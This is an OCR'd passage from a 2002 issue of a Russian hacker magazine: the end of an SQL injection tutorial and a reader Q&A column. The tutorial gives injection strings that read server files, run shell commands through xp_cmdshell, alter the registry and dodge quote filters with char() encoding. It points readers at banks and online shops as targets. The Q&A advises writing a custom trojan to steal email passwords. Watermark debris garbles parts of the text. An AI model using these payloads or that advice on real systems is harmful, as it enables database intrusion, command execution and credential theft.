“vasya’; load data infile “/../../../../boot.ini” into table dead_gibbon; — “

<Folder2>

èпосмотреть, что же у нас получилось:

“vasya’; select * from dead_gibbon; — “

Конечно, файл в таблице окажется не в лучшем своем состоянии, каждая новая строчка файла будет эквивалентна каждой новой строчке в таблице, но в принципе даже этого хватает, чтобы таскать с сервера не очень большие файлы.

Выполняем любые команды

Файлы с диска читать научились, теперь осталось добиться командной строки на сервере. Такую задачу можно достичь только на SQL-серверах небезызвестной компании Microsoft. Именно при помощи MsSQL любой версии на удаленной машине можно исполнять любые команды. Для этого нужно отослать на сервер команду

exec master..xp_cmdshell ‘dir’

и этим самым увидеть листинг текущей директории. Но это еще не все! Ребятки из Майкрософта постарались на славу и даже подключили к серверу возможность работы с реестром. Например:

exec xp_regread HKEY_LOCAL_MACHINE, ‘SYSTEM\CurrentControlSet\Services\lanmanserver\parameters’, ‘nullsessionshares’;

Это всего лишь пример, а вот список всех команд, позволяющих творить с реестром такие кренделя, которые сам создатель на этапе компиляции не задумывал:

xp_regaddmultistring (добавляем строковый параметр) xp_regdeletekey (удаляем ключ) xp_regdeletevalue (удаляем значение ключа) xp_regread (читаем ключ) xp_regremovemultistring (удаляем строковый параметр) xp_regwrite (пишем информацию в реестр)

Это далеко не весь список заподлянских команд. Все остальные ты сможешь прочитать в документации к серверу.

< Взлом >20/04\02

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

F

 

 

 

 

 

 

t

 

<PageP

067>

 

 

 

i

 

D

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

NOW!

o

 

 

 

 

to

BUY

 

 

 

 

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Защита

Так, хватит мусолить классические случаи SQL-injec- tion атак, ведь в природе есть люди, пытающиеся защититься от такого рода атак. Но опять же язык SQL имеет такое количество исключений и примочек, что запретить их все просто теоретически нельзя. Есть только один метод защиты - разрешить для ввода только символы ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghigklmnopq rstuvwxyz1234567890, а также запретить ключевые слова SQL “select, use, drop, insert и т.д.

По моему мнению, так и только так должна выглядеть защита от SQL-injection атак. Остальные методы (например, запрещение только ключевых слов и метасимволов “;” и “‘“) обходятся достаточно грациозно. Если скрипт отфильтровывает какой-либо символ, то его можно заменить конструкцией +char(0xКОД_СИМВОЛА)+. Теперь конструкция для вывода содержимого БД без использования кавычек будет выглядеть так:

select user from user where char(0x27) +user+char(0x27)=char(0x27)+char(0x27);

что абсолютно эквивалентно вот этой вещи:

select user from user where ‘user’=’’;

Ну, я думаю, для первого раза хватит. Если вдруг тебе мало, то можешь схватить небольшую подборку статей на эту тему у меня на сайте www.voy85.org. После того как переваришь всю полученную информацию, запомни, что базы данных используются в самых желанных местах для взломщиков - SQL встречается в музыкальных архивах, у провайдеров, в онлайн-магазинах, в банках...

Дальше список продолжать? Базы данных - это всегда лакомый кусочек, который никто не прочь урвать.

И еще на будущее: об SQL injection слышали далеко не все админы, так что если найдешь таковую уязвимость на каком-нибудь более-менее крупном сайте, то не спеши устраивать акты вандализма на месте преступления. После всего напиши админу письмо с описанием того, как ты совершил взлом. Админы - они хоть иногда и свиньи, но все же они люди, и помощь им никогда не бывает лишней.

КОНКУРС!!! ВЫИГРАЙ КУЧУ ЖЕЛЕЗА!

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

C

E

 

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

d

 

 

 

 

F

 

 

 

 

 

t

 

 

 

P

 

 

 

 

 

 

 

i

 

 

 

D

 

 

<Page 068>

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w Click

 

HACK-FAQ

 

 

 

 

 

 

m

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

o

 

 

 

 

.

 

 

 

 

.c

 

 

 

 

 

p

 

 

 

g

 

 

 

 

 

 

 

df

 

n

e

 

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Horrific (hack-faq@real.xakep.ru)

<???> У некоторых челов, даже с открытым доступом через шары, скан ничего не видит! Ну нет их как будто! Я тоже так хочу! Какой фаерволл?

Н: Тут есть два варианта

1.Можешь действительно установить FireWall. Тебя спасет практически любой вариант от любого производителя.

2.Советую еще войти в свойства сетевого окружения, затем в свойства “TCP/IP->контроллер удаленного доступа” и на закладке “Привязка” убрать галку с “Служба доступа к файлам и принтерам Мелкомягких”.

<???>Вот вы часто пишете 31337, а что это значит? Как расшифровывается?

Н: Все очень просто. Цифра 3 очень похожа на букву “E”, только перевернута. Цифра 1 похожа на букву “L”. Ну а цифра 7 чем-то смахивает на букву “T”. Теперь, если ты заменишь соответствующие цифры на буквы, то у тебя должно полу- читься ELEET (Элита).

Кто именно придумал такую шифровку, точно сказать трудно. Но вот распространение такая аббревиатура получила благодаря DEMO сцене.

<???>Объясни, please, что такое exploit, как его правильно получать (я вошел на securityfocus.com и набрал просто так IIS 4.5, а он, гад, ни черта не нашел).

Н: Постараюсь поподробнее. Exploit - это может быть маленькая прога, написанная на любом языке и умеющая пользоваться какой-нибудь дырой. На securityfocus.com найти их очень просто. Поищи ссылку “BugTraq” и кликни по ней. Вот теперь перед тобой список дыр и ссылки на exploit (если он есть).

 

 

 

hang

e

 

 

 

 

 

 

C

 

E

 

 

 

X

 

 

 

 

 

-

 

 

 

 

 

d

 

F

 

 

 

 

 

 

t

 

ХАКЕР\¹40\Апрель\2002P

 

 

 

 

 

i

 

D

 

 

 

 

 

 

 

r

 

 

 

 

 

NOW!

o

 

 

 

to

BUY

 

 

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

.

 

 

 

 

 

.c

 

 

p

 

 

 

 

g

 

 

 

 

df

 

 

n

e

 

 

 

 

-x cha

 

 

 

 

Задавая вопросы, конкретизируй их. Давай больше данных о системе, описывай абсолютно все, что ты знаешь о ней. Это мне поможет ответить на твои вопросы и указать твои ошибки. И не стоит задавать вопросов вроде “Как сломать www-сервер?” или вообще просить у меня “халявного” Internet’а. Я все равно не дам, я жадный :)

<???>Подскажите, плиз, какой наиболее удачный троян можно использовать, чтобы, послав его на чужое мыло, получить логин и пароль от этого мыла? Может ли он выслать эту инфу в авторежиме или надо будет просто вручную через серверную часть добывать логи и пасс?

Н: Самый лучший троян - это твой собственный. Для каждого конкретного случая лучше всего написать собственную программулину. Делается это не так уж и сложно. Например, можешь поднять спец по кодингу и посмотреть там пример написанного мной простейшего трояна (пароли он не ворует). А из готовых все хорошие трояны легко вылавливаются любым антивирусом. Все проверенные мной трояны антивири вылавливают без проблем.

<???>Я сниферю трафик в своей локалке и прекрасно все вижу.

Потом перехожу на другую машину, и снифер почему-то перестает показывать ка- кие-нибудь данные, кроме широковещательных пакетов. Сетка построена на витой паре 5-й категории.

Н: Возможно, вторая машина отделена от основной сети коммутатором. В сети на витой паре снифер принесет результат только машинам, связанным с помощью хаба. Хабы просто повторяют пришедшие данные на все порты, кроме того, откуда пришли данные. Если стоит коммутатор, то он уже занимается небольшой маршрутизацией. А именно - он отсылает пришедший пакет только на тот порт, куда надо. Остальные порты пакетов не увидят. Исключение составляют только широковещательные пакеты, которые в любом случае будут отсылаться на все порты даже у коммутатора.

<???>Я слышал, что пакеты, отправленные на адрес 255.255.255.255, отсылаются на все устройства всех сетей. А что если 100 компов будут слать такие пакеты в Инет? Это что, все компы в мире будут получать мои пакеты? Если так, то можно ли зафлудить таким образом весь Инет?

Н: Ничего у тебя не выйдет. Ни один широковещательный пакет не пройдет дальше первого попавшегося маршрутизатора. У каждого прова обязательно присутствует такая игрушка, так что на Инет твои пакеты не повлияют. Ты можешь так прикалываться только в локалке, рассылая всем свой голый зад :), а прова ты не забарбосишь. У него в любом случае должно хватить мощностей, чтобы обработать широковещательный трафик хоть ото всех его юзеров.

<???>Меня глючит или у вас главная страница новая? Ну ладно, к делу! Как узнать инфу по креде через номер.

Н: Наверно, тебя глючит, потому что страница у нас старая, а вот дизайн новый как в журнале, так и на сервере :). Все параметры карты строго засекрече- ны и хранятся только в банке. Получить любую инфу о владельце или о карте можно только с разрешение суда (такое дается только правоохранительным органам) или взломав сервер банка. Просто так банки никогда не раздают инфу о своих клиентах.

<???>Ты не знаешь, как отправить почту без Интернета, а?

Н: Засовываешь письмо в простой бумажный конверт и относишь на почту :). Ну а если у тебя нет Инета и ты хочешь отправить именно e-mail, то это можно сделать через FIDO или на любом отделении связи с выходом в Инет (этот вариант за деньги).

68 Ньюсы 1 Феррум 2 PC_Zone 3 X-Стиль 4 Взлом

Соседние файлы в папке журнал хакер